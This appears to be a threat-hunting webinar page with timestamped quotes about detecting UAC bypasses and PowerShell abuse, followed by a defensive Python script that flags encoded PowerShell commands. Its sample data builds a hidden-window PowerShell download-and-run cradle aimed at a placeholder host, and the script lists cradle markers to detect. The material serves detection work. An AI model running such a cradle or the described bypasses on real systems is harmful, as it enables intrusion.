Presenters: Joe Moles, Adam Mathis, Jimmy Astle

Testing visibility to develop an innovative threat hunting program

Gain the visibility you need to hunt for adversary techniques.

Increasing both the quality and the quantity of data analysis requires a robust set of tools, techniques, and practices. Watch this webcast to learn how to use Carbon Black Response (Cb Response) to hunt for frequently used MITRE ATT&CK techniques, then run Atomic Red Team tests to measure, and improve, the visibility those hunts depend on.

Ideal for:

  • Security architects, security engineers, SOC & CIRT leaders
  • Hunting Maturity Model (HMM): Level 2-3
  • Technical depth: intermediate to advanced

01:43 Presenter Introduction

02:25 Tools We’ll Be Using

  1. MITRE’s ATT&CK Framework
  2. Cb Response
  3. Red Canary’s Atomic Red Team

03:08 Webinar Agenda

04:02 Demonstration

06:05 “It takes all the MITRE techniques and puts them into a nice visual representation.” -Jimmy

08:40 The UAC Bypass Techniques We Will Review

09:02 “These binaries have a special attribute to them so that when they execute, they’re actually allowed to auto-elevate their permissions.” -Jimmy

11:43 eventvwr.exe

11:48 “Without admin rights, you can modify this key to then get to this token.” -Jimmy

17:25 sdclt.exe

17:54 “The researcher that discovered this had opened this binary up in IDA and noticed that it took a kick-off-elevation command-line parameter, and that is what actually does that auto-elevation and allows the UAC bypass.” -Jimmy

19:00 Using Tools Effectively

19:14 “I can’t stress enough how important it is to use tools like PowerShell Empire.” -Jimmy

21:26 “Once you have completed your hunt, there should be an output. You should have something that says ‘I hunted for this thing, and now I am going to automate it going forward.’” -Adam

23:45 Testing Atomically

25:03 “Testing is critical in pretty much every aspect of your security program. If you don’t test it, you don’t know it works.” -Adam

25:18 “The idea of the Atomic Red Team is to enable rapid, iterative testing, enabling you to grow your security program and build efficacy.” -Adam

26:36 “One of the ways we can use this is that we have this index we create dynamically when new tests are contributed.” -Adam

27:06 The Testing Cycle

28:50 “At the end of the day, this is not a ‘one and done.’ This is a ‘continue to test so I can iterate through this.’ I continue building out my detection and build out the rest of my security program.” -Adam

31:48 PowerShell

32:42 “Looking for encoded commands is a great way to find boatloads of evil.” -Adam

33:10 Encoded PowerShell Video

34:00 “Don’t test on things you aren’t authorized to test on.” -Adam

35:15 Atomic PowerShell

35:22 “Going through the Atomic Red Team, there’s a lot of PowerShell tests.” -Adam

37:42 Privilege Escalation

39:02 Scheduled Tasks

40:05 “You don’t have to catch everything the actor does, you just have to catch them once.” -Adam

40:30 Service Creation

40:33 “Modifying existing services is another thing that PowerUp does to escalate their privileges.” -Adam

43:35 Always Be Testing

43:45 “Follow your ABTs: Always Be Testing.” -Adam

43:49 “It’s one of those things that you will always be testing and always be tuning because the security landscape is always changing.” -Adam

44:28 Questions and Answers

44:43 Question 1: How do I pick where to start?

45:17 “I think you start where you have the best tooling and visibility available to you.” -Adam

47:46 Question 2: What other key indicators are you focusing on if you are hunting privilege escalation?

48:39 “Scoping it around user behavior is also a really interesting one that leads to a lot of really good threat hunting outcomes.” -Adam

51:05 Question 3: Have you actually seen a UAC bypass that works when credentials aren’t required to be entered? And what kind of indicators would you be looking for around an lsass and Mimikatz type attack?

51:59 “We see samples all the time that reuse these publicly available UAC bypasses.” -Jimmy

52:10 “At the end of the day, you should be looking at untrusted processes and things you’ve never seen before touching lsass.” -Jimmy

54:19 Question 4: What kind of metrics would you report up to management to justify for this type of program or to advocate for building more hunting into your processes?

55:02 “Dedicating some percentage of your analyst’s time to searching for well-known documented behaviors should be a gimme.” -Adam

57:36 Question 5: Where and when do you draw the line between threat hunting and incident response procedures when you’re performing atomic testing and hunting engagement?

58:40 “It’s pretty black and white in the sense of that’s normal, that’s not normal. I think overlaying that with the behaviors that you would’ve expected to see is going to lead you down that path of ‘we should probably call people or get the lawyers involved’ or whatever your incident response process is.” -Jimmy

59:58 Question 6: Have we seen technology vendors building signatures to match atomic tests?

01:00:34 “I have actually seen live threat actors pulling artifacts from GitHub repos.” -Jimmy
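The encoded-PowerShell hunt the presenters describe (32:42 and 35:15: flag PowerShell launched with -EncodedCommand, decode the base64 UTF-16LE payload, then weigh it against the surrounding context) is exactly the kind of output that should be automated once the hunt is done (21:26). The Python below is an added example written for this page; it is not code from the webinar, Red Canary, Atomic Red Team or Cb Response. The process-start records are constructed, the list of "office" parents and the risk indicators are assumptions chosen for illustration, and the example.invalid URL is a placeholder. The same block builds an encoded payload the way a test (or an attacker) would and then checks that the detection logic catches it, which is the test-then-detect loop the page advocates.

```python
"""Hunt process-start telemetry for encoded PowerShell command lines.

Added example for this page, not the webinar's or any vendor's code.
The event records below are constructed for illustration only.
"""
import base64
import binascii
import shlex

# powershell.exe resolves the parameter from any prefix of "EncodedCommand"
# starting at "-e"; "-e", "-en" and "-enc" are what shows up in the wild.
ENCODED_PARAM = "encodedcommand"

# Switches that often accompany malicious launches. Each raises the score;
# none is proof on its own (assumed set for this example).
RISKY_FLAGS = {
    "nop": "no-profile", "noprofile": "no-profile",
    "noni": "non-interactive", "noninteractive": "non-interactive",
    "w": "window-style", "windowstyle": "window-style",
    "ep": "execution-policy", "executionpolicy": "execution-policy",
}

# Parents that should rarely spawn PowerShell (assumed list).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Substrings typical of download/eval cradles (assumed list).
CRADLE_MARKERS = ("downloadstring", "iex", "invoke-expression", "frombase64string")


def encode_command(script: str) -> str:
    """Build the -EncodedCommand argument: base64 of the UTF-16LE script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(blob: str):
    """Reverse of encode_command. None if the blob is not valid base64 or
    not valid UTF-16LE, i.e. something PowerShell itself would reject."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def is_powershell(image: str) -> bool:
    name = image.rsplit("\\", 1)[-1].lower()
    return name in {"powershell.exe", "powershell", "pwsh.exe", "pwsh"}


def analyze_event(event: dict):
    """Return a finding for an encoded PowerShell launch, else None."""
    tokens = shlex.split(event["cmdline"], posix=False)
    if not tokens or not is_powershell(tokens[0]):
        return None
    indicators, finding = [], None
    for i, tok in enumerate(tokens[1:], start=1):
        if not tok.startswith(("-", "/")):
            continue
        param = tok.lstrip("-/").lower()
        if param and ENCODED_PARAM.startswith(param):
            blob = tokens[i + 1] if i + 1 < len(tokens) else ""
            decoded = decode_command(blob)
            if decoded is None:
                indicators.append("malformed-encoded-command")
            finding = {"host": event["host"], "parent": event["parent"].lower(),
                       "decoded": decoded, "indicators": indicators}
        elif param in RISKY_FLAGS:
            indicators.append(RISKY_FLAGS[param])
    if finding is None:
        return None
    if finding["parent"] in OFFICE_PARENTS:
        indicators.append("office-parent")
    text = (finding["decoded"] or "").lower()
    if any(marker in text for marker in CRADLE_MARKERS):
        indicators.append("download-or-eval-cradle")
    finding["score"] = len(indicators)
    return finding


def hunt_encoded_powershell(events):
    """Findings ranked by indicator count; a score of 0 is still a lead to review."""
    findings = [f for f in (analyze_event(e) for e in events) if f]
    return sorted(findings, key=lambda f: f["score"], reverse=True)


# Constructed telemetry in the shape of an EDR process-start record. Not real data.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')"
SAMPLE_EVENTS = [
    {"host": "ws01", "parent": "explorer.exe",
     "cmdline": 'powershell.exe -NoProfile -Command "Get-Process"'},
    {"host": "ws02", "parent": "WINWORD.EXE",
     "cmdline": "powershell.exe -nop -w hidden -enc " + encode_command(PAYLOAD)},
    {"host": "ws03", "parent": "cmd.exe",
     "cmdline": "powershell -EncodedCommand " + encode_command("Get-Date")},
    {"host": "ws04", "parent": "svchost.exe", "cmdline": "notepad.exe C:\\notes.txt"},
    {"host": "ws05", "parent": "cmd.exe", "cmdline": "powershell -e notbase64!!"},
]

if __name__ == "__main__":
    for f in hunt_encoded_powershell(SAMPLE_EVENTS):
        print(f["score"], f["host"], f["parent"], f["indicators"], repr(f["decoded"]))
```

Running the block ranks the Word-spawned, hidden-window download cradle first, the malformed blob second (PowerShell would have rejected it, but someone typed it), and the plain Get-Date last with a score of 0. That last case is the point of the caveat at 32:42: encoded commands are a hunting lead, not a verdict, so the decoded text and parent process have to be reviewed before a rule is written.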
